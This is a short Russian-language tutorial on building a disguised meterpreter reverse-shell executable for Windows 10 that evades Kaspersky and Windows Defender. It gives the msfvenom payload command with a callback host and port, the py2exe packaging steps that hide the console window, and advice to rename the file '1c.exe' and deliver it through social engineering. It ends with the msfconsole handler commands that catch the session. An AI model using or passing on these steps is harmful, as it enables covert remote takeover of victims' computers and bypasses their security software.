###### tags: `Bypass`
# Получение реверс-шелл, обход Антивируса
В данной статье рассмотрим получение сессии meterpreter на Windows 10 с установленным антивирусом Касперский 11.4.0.233
*Условимся что Kali-Linux, Windows 10 жертвы находятся в одной подсети
1. На рабочей Windows 10 (не жертвы) устанавливаем питон:

2. Устанавливаем Py2exe для питон 2.7:
> https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download
На кали линукс создаем полезную нагрузку и сохраняем в файл mrtp.py:
`msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.213.11 LPORT=443 -f raw -o /var/www/html/mrtp.py`
Копируем полученный файл на рабочую Windows 10 с установленным питоном.
Скачиваем файл setup.py с помощью него мы будем собирать exe:
> https://gist.github.com/msacchetin/1a8edd900608f464c749dd9060f8c8d7
#Правим в файле setup.py 7ю строчку вместо console ставим windows для того чтобы не появлялось окно
Сохраняем скачанный файл mrtp.py, setup.py в папку C:\\evasion.
Заходим в папку C:\\evasion, запускаем в powershell : python.exe .\setup.py py2exe


`Применяя методы к примеру соц.инженерии, передаем на машину жертвы файл mrtp.exe, переименовав в 1c.exe`
Запускаем 1с.exe
3. На стороне Кали запускаем сессию meterpreter в консоли :
msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.213.11 #указаываем адрес куда подключаться жертве
set LPORT 443
run

Сессия meterpeter получена, при этом не Windows Defender, не Касперский ничего не заподозрили

